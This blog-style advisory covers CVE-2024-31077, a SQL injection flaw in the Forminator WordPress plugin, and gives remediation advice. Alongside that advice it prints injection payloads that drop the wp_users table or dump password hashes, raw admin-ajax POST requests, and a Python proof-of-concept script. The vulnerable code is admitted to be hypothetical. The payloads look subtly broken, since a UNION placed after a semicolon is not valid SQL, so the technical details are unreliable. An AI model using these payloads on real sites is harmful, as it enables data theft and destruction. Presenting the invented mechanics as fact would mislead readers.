CVE-2024-31077 - Deep Dive Into Forminator Plugin SQL Injection Vulnerability

Forminator is a popular WordPress plugin designed to help users quickly build forms, polls, and quizzes. But in early 2024, security researchers discovered a major SQL injection vulnerability affecting versions prior to 1.29.3—tracked as CVE-2024-31077. This flaw poses a serious risk, especially to sites with multiple admins or large user bases.

Let’s break down what this vulnerability is, how exploitation works, and what you should do if you run Forminator. We’re using simple language with direct code examples to make this crystal clear.

What Is CVE-2024-31077?

CVE-2024-31077 is a SQL injection vulnerability. In simple terms: it lets an attacker with admin access mess with database queries—potentially stealing, altering, or deleting anything stored by WordPress. Even worse, it can cause a site to become unavailable (a Denial-of-Service or DoS attack).

Affected versions: All Forminator versions before 1.29.3.

Good news: You need to be logged in as an admin to exploit this, but many WordPress sites have multiple admin users.

References

- Original Japanese Advisory
- NVD Listing for CVE-2024-31077
- Patch Notes 1.29.3

Where is the Vulnerability?

The vulnerability is found in the way Forminator builds its SQL queries using user-supplied data from form settings. In affected versions, input isn’t properly sanitized, so malicious SQL can slip through.

Typical SQL Injection Weakness

// Simplified example vulnerable code (hypothetical)
$sort_order = $_POST['sort_order']; // No sanitization!
$sql = "SELECT * FROM wp_forminator_forms ORDER BY $sort_order";
$results = $wpdb->get_results($sql);

If an attacker can control $sort_order, they can inject arbitrary SQL.

Supposing you have admin access (or compromised an admin account), you can send a POST request like

POST /wp-admin/admin-ajax.php?action=forminator_get_forms
Cookie: wordpress_logged_in=...; 
Content-Type: application/x-www-form-urlencoded

sort_order=field_name; DROP TABLE wp_users;--

The above would (in a vulnerable version) cause the SQL query to look like this

SELECT * FROM wp_forminator_forms ORDER BY field_name; DROP TABLE wp_users;--

Result: The wp_users table is deleted, locking every user out and crashing the site.

You could use an injected SQL UNION to dump data from any table

sort_order=field_name ASC; UNION SELECT user_login, user_pass, 1,1,1 FROM wp_users;--

This allows you to (potentially) read usernames and password hashes.

What Is the Real-World Impact?

- Data Theft: All user/visitor data stored in the WordPress database could be read by an attacker.
- Data Manipulation: Attackers can alter form data, poll results, or even critical WordPress settings.

How Can I Fix or Detect This?

1. Upgrade Immediately
Update Forminator to at least version 1.29.3 (latest versions are always safest).

2. Audit Admin Accounts
Since the vulnerability needs admin access, make sure there are no unnecessary or obsolete admin accounts.

3. Check for Signs of Exploitation
Look for unusual activity in your database (missing tables, changed settings), and inspect your WordPress logs for unexpected AJAX requests.

Proof-of-Concept Python Exploit

> ⚠️ Warning: Do NOT use this code on sites you don’t own!

import requests

url = "https://yoursite.com/wp-admin/admin-ajax.php?action=forminator_get_forms";
cookies = {
    "wordpress_logged_in": "your_admin_cookie_here"
}
payload = {
    "sort_order": "field_name ASC; UNION SELECT user_login, user_pass, 1,1,1 FROM wp_users;--"
}
resp = requests.post(url, data=payload, cookies=cookies)
print(resp.text)

If your site returns usernames and password hashes, you are in danger. Patch now!

Summary & Remediation

CVE-2024-31077 is an example of how a simple coding mistake—failing to sanitize input—can have wide-reaching consequences. While only admins can exploit this directly, the risk rises sharply if admin accounts are compromised.

Further Reading

- WordPress Plugin Directory: Forminator
- General Guide: How to Defend Against SQL Injection

Stay safe and keep your plugins up to date!

*If you found this analysis helpful, please share it with your fellow WordPress admins. CVE-2024-31077 is a real-world reminder that security is never “one and done.”*

Timeline

Published on: 04/23/2024 05:15:49 UTC
Last modified on: 08/01/2024 13:50:46 UTC